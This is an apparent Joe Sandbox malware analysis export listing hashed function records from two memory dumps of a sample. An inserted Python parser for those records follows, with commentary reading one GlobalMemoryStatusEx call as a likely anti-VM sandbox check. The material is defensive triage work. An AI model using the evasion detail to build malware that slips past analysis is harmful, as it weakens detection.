                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67b59917aff8bca90ef4e63b6f0dd77a241cfb8f01047b61b5bd9e5a1128f597
                                          • Instruction ID: ffeda4fbde1818c3f4838bd02926fd6bfddc31da8648c811b360ed836bec304c
                                          • Opcode Fuzzy Hash: 67b59917aff8bca90ef4e63b6f0dd77a241cfb8f01047b61b5bd9e5a1128f597
                                          • Instruction Fuzzy Hash: 06224D30E101099BEF64DBA8D8907EDBBA2FB85310F259425E409EB391DEB5DD81CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49594c945743e4510ee5eab92c43011f098843da1e3118c418d36916e140947a
                                          • Instruction ID: 0c9b6d08222a685a3908e0d0e9831fe9faadff5acbad3969d637c4492fb2b363
                                          • Opcode Fuzzy Hash: 49594c945743e4510ee5eab92c43011f098843da1e3118c418d36916e140947a
                                          • Instruction Fuzzy Hash: 11322B31E1061ACBCB54EF75C85059DB7B2FFC9300F6596A9D409BB254EF70AA85CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c8eeb6cae3a306037774ef275cd14eed85aa04abd973972b3e9f204f202a8b8b
                                          • Instruction ID: 285204094a74235d3c2314df6ec3b619d4c3c4b7b6c729553e2a125d84b16ceb
                                          • Opcode Fuzzy Hash: c8eeb6cae3a306037774ef275cd14eed85aa04abd973972b3e9f204f202a8b8b
                                          • Instruction Fuzzy Hash: DB028E30B01206CFDB58EF68D8507AEB7A6FF88300F259569E505AB395DB75EC42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                           Control-flow Graph (rendered graph; only the block and call structure survives in the text export): graph rooted at 00DEEC10, basic blocks 00DEEBCA-00DEED9D, call targets 00DEEC10 and 00DEECF8 from the site at 00DEEC6D; the block 00DEECDF-00DEED6C invokes GlobalMemoryStatusEx and branches to 00DEED6E-00DEED74 or 00DEED75-00DEED9D. The executed / not-executed colouring of the graph is not recoverable from the text.
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4530677615.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_de0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5dbe1ed925def0147e397191beea6faf00e9d80aec17e528c0d01dd49063a603
                                          • Instruction ID: afde8b3ab2619f83dc807145e9d1c66831063f8a9b3bafd5ae853b8eeb91bedb
                                          • Opcode Fuzzy Hash: 5dbe1ed925def0147e397191beea6faf00e9d80aec17e528c0d01dd49063a603
                                          • Instruction Fuzzy Hash: 04512331904399AFC710DF6AD8046EABBF9AFCA310F18856AE905A7241DB749844C7F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                           Control-flow Graph (rendered graph; only the block structure survives in the text export): function at 00DEECF8; the entry block 00DEECF8-00DEED6C invokes GlobalMemoryStatusEx and then branches to 00DEED6E-00DEED74 or 00DEED75-00DEED9D, with 00DEED6E-00DEED74 falling through to 00DEED75-00DEED9D.
                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE ref: 00DEED5F
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4530677615.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_de0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          • Opcode ID: ef24981819fb56bf84b65637ccf5769b41327d7acd6052b2b3f4fe6248a61e2e
                                          • Instruction ID: 84235573bd8bcfa53d5f0407ef3c8a6e67e78ff28323ee86f9cf1cb3ac59f5b8
                                          • Opcode Fuzzy Hash: ef24981819fb56bf84b65637ccf5769b41327d7acd6052b2b3f4fe6248a61e2e
                                          • Instruction Fuzzy Hash: 5A1114B1C0065A9BCB10DF9AC44479EFBF4AF48720F14812AD918A7240D778A950CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

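The per-function records in this section (an optional APIs list, then Source File with region offset, Snapshot File, the Similarity fields, Opcode ID, Instruction ID, the two fuzzy hashes and a Uniqueness Score) follow one fixed layout, which makes them easy to pivot on once parsed: which dumped region a function was lifted from, which functions reference an API, and which fuzzy hashes to reuse when hunting for the same function in other samples. The following is an added example, not part of the Joe Sandbox report or of its IDA plugin. The two embedded records are copied from this section; the field names are the report's own; the reading of a negative Uniqueness Score as "not computed" is an assumption, marked as such in the code.

```python
"""Parse Joe Sandbox per-function 'Memory Dump Source' records (text report rendering)
into rows pivotable on dump region, API reference and fuzzy hash.  Added example; not
part of the Joe Sandbox report or of its IDA plugin."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records in the layout the text report uses.  The first is
# preceded by its 'APIs' list (the GlobalMemoryStatusEx function lifted from the
# 0x00DE0000 dump); the second, from the 0x065B0000 dump, has no API references.
SAMPLE = """\
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 00DEED5F
Memory Dump Source
• Source File: 0000000F.00000002.4530677615.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_de0000_nNdsLvHyWi.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: ef24981819fb56bf84b65637ccf5769b41327d7acd6052b2b3f4fe6248a61e2e
• Instruction ID: 84235573bd8bcfa53d5f0407ef3c8a6e67e78ff28323ee86f9cf1cb3ac59f5b8
• Opcode Fuzzy Hash: ef24981819fb56bf84b65637ccf5769b41327d7acd6052b2b3f4fe6248a61e2e
• Instruction Fuzzy Hash: 5A1114B1C0065A9BCB10DF9AC44479EFBF4AF48720F14812AD918A7240D778A950CFA1
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 008b370c76e1311f889b34f8e8cf6be07590f2d4760bdb7ca845d2952f2ca919
• Instruction ID: 178735bc7ec2285679417b3bad66d33a38dee0356c5aee53a5601fff38490373
• Opcode Fuzzy Hash: 008b370c76e1311f889b34f8e8cf6be07590f2d4760bdb7ca845d2952f2ca919
• Instruction Fuzzy Hash: 5E625E3060060ACFDB55EF68D580A9DB7B2FF85310B209A68D1099F359EF75ED46CB90
Uniqueness
Uniqueness Score: -1.00%
"""

BULLET = r"^[•*-]\s*"
API_REF = re.compile(BULLET + r"(?P<api>\w+)\.(?P<mod>\w+)\s+ref:\s*(?P<addr>[0-9A-Fa-f]+)\s*$")
SOURCE = re.compile(BULLET + r"Source File:\s*(?P<dump>[^,]+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)\s*$")
FIELD = re.compile(BULLET + r"(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
SCORE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?\d+(?:\.\d+)?)%\s*$")


@dataclass
class FunctionRecord:
    dump: str
    offset: int            # base address of the dumped region the function was lifted from
    based_on_pe: bool
    apis: list             # (api, module, ref_addr) tuples from the preceding 'APIs' list
    fields: dict = field(default_factory=dict)   # Snapshot File, Opcode ID, hashes, ...
    uniqueness: Optional[float] = None


def parse_records(text):
    """API lines precede their record's 'Source File' line; 'Uniqueness Score' closes it."""
    records, pending_apis, cur = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := API_REF.match(line):
            pending_apis.append((m["api"], m["mod"], int(m["addr"], 16)))
        elif m := SOURCE.match(line):
            cur = FunctionRecord(m["dump"], int(m["off"], 16), m["pe"] == "true", pending_apis)
            pending_apis = []
        elif cur is None:
            continue            # legend lines, 'Joe Sandbox IDA Plugin', etc. outside a record
        elif m := SCORE.match(line):
            cur.uniqueness = float(m["score"])
            records.append(cur)
            cur = None
        elif m := FIELD.match(line):
            cur.fields[m["key"]] = m["val"]
    return records


def functions_by_region(records):
    """Region base -> records, to tell the 0x00DE0000 and 0x065B0000 stages apart."""
    by_region = {}
    for r in records:
        by_region.setdefault(r.offset, []).append(r)
    return by_region


def api_references(records):
    """(api, module, ref_addr, region) tuples: the pivot for 'who calls GlobalMemoryStatusEx'."""
    return [(api, mod, addr, r.offset) for r in records for api, mod, addr in r.apis]


def instruction_fuzzy_hashes(records):
    """Opcode ID -> Instruction Fuzzy Hash, the pair reused to match functions across samples."""
    return {r.fields["Opcode ID"]: r.fields["Instruction Fuzzy Hash"] for r in records}


def unscored(records):
    """Negative scores lie outside 0-100; read here (assumption) as 'not computed'."""
    return [r for r in records if r.uniqueness is not None and r.uniqueness < 0]
```

Two things worth knowing when reading the output. First, every record in this section carries Uniqueness Score: -1.00%, so the score cannot be used to rank functions here; the parser reports those records separately rather than treating them as "very common". Second, the only API reference in this section is GlobalMemoryStatusEx from the function in the 0x00DE0000 region, and its graph branches immediately after the call. Given the AntiVM3 Yara hit in the report's signature list, that is the function a triager would inspect first as a candidate physical-memory sandbox check; that is an interpretation of the two facts the report shows, not something the report states.
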
                                           Control-flow Graph (rendered graph; only the block and call structure survives in the text export): function at 065BCFB8, basic blocks 065BCFB8-065BDB17, call targets 065B65D8 (from the sites at 065BD40C, 065BD91B and 065BDA9D) and 065BDB2D (from 065BDA71); no API references are listed for this function. The executed / not-executed colouring of the graph is not recoverable from the text.
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 008b370c76e1311f889b34f8e8cf6be07590f2d4760bdb7ca845d2952f2ca919
                                          • Instruction ID: 178735bc7ec2285679417b3bad66d33a38dee0356c5aee53a5601fff38490373
                                          • Opcode Fuzzy Hash: 008b370c76e1311f889b34f8e8cf6be07590f2d4760bdb7ca845d2952f2ca919
                                          • Instruction Fuzzy Hash: 5E625E3060060ACFDB55EF68D580A9DB7B2FF85310B209A68D1099F359EF75ED46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da76ad0947306816f06fec6b18381436904449411425a08b676fea36a49aa49e
                                          • Instruction ID: 6d49ebc56f5b82fb732f93956c1a788a66c9f58b2fbfa506ec3173bfafb1a490
                                          • Opcode Fuzzy Hash: da76ad0947306816f06fec6b18381436904449411425a08b676fea36a49aa49e
                                          • Instruction Fuzzy Hash: 80024A30E0020A8FDBA4DF68D4806ADB7B2FB85310F24956AE419EB251DFB5DD45CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f712fd51685ea2b0dde8f4e349d1ce4316ac9a2c81fd9b4ba689ee6e4a7d24c0
                                          • Instruction ID: 4e5a78e870173a556cd960cb5035a79a2d96bfb57241705397b14ac08e0f9c74
                                          • Opcode Fuzzy Hash: f712fd51685ea2b0dde8f4e349d1ce4316ac9a2c81fd9b4ba689ee6e4a7d24c0
                                          • Instruction Fuzzy Hash: 68E17030F002068FDB69EB69D8806AEBBB2FFC5300F219569E505EB355DF759846CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef4d3e32d9f02d8c33a657f8346c56817321cc1eca715f071445a225f4dd584a
                                          • Instruction ID: 019f946c79096294032ed4af0d75cfbf7cb1af5d0ef51385e440e6154dcb7b82
                                          • Opcode Fuzzy Hash: ef4d3e32d9f02d8c33a657f8346c56817321cc1eca715f071445a225f4dd584a
                                          • Instruction Fuzzy Hash: 7D912B30F0020A8FDB54EF69D9507AEB7B2BFCA600F118569D909EB384EA759D41DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 13c78db99063b6e68ed323d08383c8b51019a85a5b359d527b1ba8c9cf8a4c2d
                                          • Instruction ID: eb1d26b6b14b69997600b9daccc532553ae84ea16e7b8d77e2abb325c105ee7e
                                          • Opcode Fuzzy Hash: 13c78db99063b6e68ed323d08383c8b51019a85a5b359d527b1ba8c9cf8a4c2d
                                          • Instruction Fuzzy Hash: 6361B371F000214BDF549A6DCC94A9FFADBAFC4610B154439D80ADB3A0DEB5DD028BD5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fdbbc520e95006ece2fe26b55e8c8374e02f919fca4ce8383bcec422b8e6dc42
                                          • Instruction ID: 674f85e35e4c4ca84d39d94e275e7d6cd0197ba5757c1116f9973bee08417eb2
                                          • Opcode Fuzzy Hash: fdbbc520e95006ece2fe26b55e8c8374e02f919fca4ce8383bcec422b8e6dc42
                                          • Instruction Fuzzy Hash: 8F813D30B0160A8BDF54DFA8D4507AEB7F2BF89300F159429D50AEB389DB75DC468B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a8840c817b628db702f59dc468c75f5f2521e698511fbacdf097b51ef7a1a13
                                          • Instruction ID: e963683300bf1d402c0dad6a78068f238220bfcc347e887d7850cf2b687568ec
                                          • Opcode Fuzzy Hash: 6a8840c817b628db702f59dc468c75f5f2521e698511fbacdf097b51ef7a1a13
                                          • Instruction Fuzzy Hash: A9913F30E102598FDF64DF68C850BDDBBB1FF85310F208599E549AB285DB71AA85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47072415c91bb417d945e318af1d1e000329e6d0da60f4d27addec0a59551fb7
                                          • Instruction ID: f64db571566c371f83aebda1248df58661a7cd9a326379ae18bd8cd29879e67e
                                          • Opcode Fuzzy Hash: 47072415c91bb417d945e318af1d1e000329e6d0da60f4d27addec0a59551fb7
                                          • Instruction Fuzzy Hash: 54912D30E106198BDF64DF68C850BDDB7B1FF89310F208599E509BB285DB71AA86CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0c7443ccc8faa128a7e5e4e4bf5624fa513e97ec976ee15717f1ee43dd6bdcb
                                          • Instruction ID: ca0060aaf2cdf4ada16d0ba7b1fb87c5c6f0a2c92e562f580cf6605ef1c54ef2
                                          • Opcode Fuzzy Hash: b0c7443ccc8faa128a7e5e4e4bf5624fa513e97ec976ee15717f1ee43dd6bdcb
                                          • Instruction Fuzzy Hash: A3715C74A002099FDB54EFA9D980AEDBBF6FF84300F149429E405EB355DA70E946CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f8063f2e346ce43eee6182369e3168275a04e2df4f291c62801bbfe91d894fa
                                          • Instruction ID: 1c93b5c64aa804e63f3e5a1382f18e408370b1fd756c46b350599bf3d8a03b7a
                                          • Opcode Fuzzy Hash: 0f8063f2e346ce43eee6182369e3168275a04e2df4f291c62801bbfe91d894fa
                                          • Instruction Fuzzy Hash: E2713970A002099FDB44EFA9D980ADEBBF6FF88300F249429E405EB355DA70E946CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf005a5ee25287aa3dba458a170ff803191f57a346e87fd301acb00ab691b610
                                          • Instruction ID: 0b8cde29d1e94a9c8bdc7d6dc175b7bc6a62bdda4a0effcddf6da709a1690dae
                                          • Opcode Fuzzy Hash: cf005a5ee25287aa3dba458a170ff803191f57a346e87fd301acb00ab691b610
                                          • Instruction Fuzzy Hash: 52618030F002199FEB549FA4D8547AEBBF6FB88710F208429E505EB395DA758C45DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da7299f5c1d7fdaf06c967b3aa363e4e99ab98fa1a76b2837cadcc9bedc16d34
                                          • Instruction ID: 04fd7fcdee3c91d957b3d915fe552bc5e2e36003273dbc760b50a45704c0e3cf
                                          • Opcode Fuzzy Hash: da7299f5c1d7fdaf06c967b3aa363e4e99ab98fa1a76b2837cadcc9bedc16d34
                                          • Instruction Fuzzy Hash: 4751C231E00106DFDB54AB78E8846EEBBB2FB85315F10886AE206D7251DB359945CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0bf89023edf3320e5c112b502c8e8fbd58dc63263cd35c712cc09cd0c177f9d
                                          • Instruction ID: 2399073ccd13840c10d5fb8249cfce5491070badbd704f492fd11cc2d0134ee6
                                          • Opcode Fuzzy Hash: a0bf89023edf3320e5c112b502c8e8fbd58dc63263cd35c712cc09cd0c177f9d
                                          • Instruction Fuzzy Hash: F051A634F102159BEF6456BCDC54BAF3B5AF7CA310F20542AE60AC7396DE69CC414BA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: abe62f5c192ff44dd6ec6afe8d1808b25807127f321915ddf41d8c9c4d435c2d
                                          • Instruction ID: a735304ad6dd1486ab852f218b8a2d8929adbf71a068e832ff18f0a3fd92c5d3
                                          • Opcode Fuzzy Hash: abe62f5c192ff44dd6ec6afe8d1808b25807127f321915ddf41d8c9c4d435c2d
                                          • Instruction Fuzzy Hash: 18514F30B001069FEB54EB75D950BAEB7F6FBC9600F158569D50AEB384EA31DC41DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ebd96b8329c4fcef29db7150e571020c1e5415e60f34c936718a1ffd7aaf4e0
                                          • Instruction ID: e3f7a4e3332fe4b576c31c62aaff28e07ce5f9337de29c005ba908d35a4336e3
                                          • Opcode Fuzzy Hash: 0ebd96b8329c4fcef29db7150e571020c1e5415e60f34c936718a1ffd7aaf4e0
                                          • Instruction Fuzzy Hash: 0C518134F102159BEF6466BCDC547AF3A5AF7CA310F20542AE60AC7396DE69CC414BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f4e127a646b535b34817259a0e5419333d4e3fdabccfbc3067d940657a6ba92
                                          • Instruction ID: 812966b9b83121f474fa3c857958d2d7c013a30c24679bfb24e9662df7e2370b
                                          • Opcode Fuzzy Hash: 0f4e127a646b535b34817259a0e5419333d4e3fdabccfbc3067d940657a6ba92
                                          • Instruction Fuzzy Hash: 19419270B002189FDB549FA5C854BAEBBF6FF88740F208529E105AB395DA749D05CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1296000076eb4656a346364e10914769687b00c6abb50685d660a0461f9bb865
                                          • Instruction ID: faf3c4e914cf6976f8bd13e160a0edf629a44cf7408c83234f2ffdd05067f812
                                          • Opcode Fuzzy Hash: 1296000076eb4656a346364e10914769687b00c6abb50685d660a0461f9bb865
                                          • Instruction Fuzzy Hash: 39416E71E006099FDB64CFA9D881AEEFBB2FB84311F10492AD256D7650E630E8558F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a310c75bc9ca6d5427c2e704babc8757b3dd676d02a63ea684bb4fc6fccbd8ff
                                          • Instruction ID: 8f52d9caef1aec5cc3dedb7942692e41e179f8b3628ef0938b012261e9ae0dd3
                                          • Opcode Fuzzy Hash: a310c75bc9ca6d5427c2e704babc8757b3dd676d02a63ea684bb4fc6fccbd8ff
                                          • Instruction Fuzzy Hash: 66417030E0070ADFDB65DF65D8406AEBBB2FF86300F249A29D405DB240EBB59946CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80383764a803d492df471398b34bb81a4de383e39eeafea0031173b17d2384a5
                                          • Instruction ID: e91c4adaa2b1638d199f7ee4b3046f91dd985e2bf5e03f9ae546456aba702cf6
                                          • Opcode Fuzzy Hash: 80383764a803d492df471398b34bb81a4de383e39eeafea0031173b17d2384a5
                                          • Instruction Fuzzy Hash: AE31C130B002058FDB48AB75C9146BFBBA3BB8A700F249528D406DB395DE35DD02CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80cc74f1dae7e8c7fa1057f6dbca45edf09f7d7b9e1f40454bc139f2e029f8c8
                                          • Instruction ID: 2d6ca34d51c221adbfafa30c0a7f76c8a626d82612e8c684f684e01ea2b06f64
                                          • Opcode Fuzzy Hash: 80cc74f1dae7e8c7fa1057f6dbca45edf09f7d7b9e1f40454bc139f2e029f8c8
                                          • Instruction Fuzzy Hash: 83319034E10606DBCB19DF64D8546AEB7F2FF8A300F148529E906EB750DB71AD86CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 20817bf3ff201d7e5f0cc5ca452668de2b5345482f450e3db518c13227b24ca7
                                          • Instruction ID: 1abb7ba71a1414d9464f762a597abde8848e4018d616e90019bf5d1c852685d7
                                          • Opcode Fuzzy Hash: 20817bf3ff201d7e5f0cc5ca452668de2b5345482f450e3db518c13227b24ca7
                                          • Instruction Fuzzy Hash: 39319034E10606DBCB18DF64D894AAEB7F2FF89300F148529E906E7750DB71AD46CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8142405fb3733879dd50f44bdefcfcd67af5acd01a2e8d804884ae68902f294
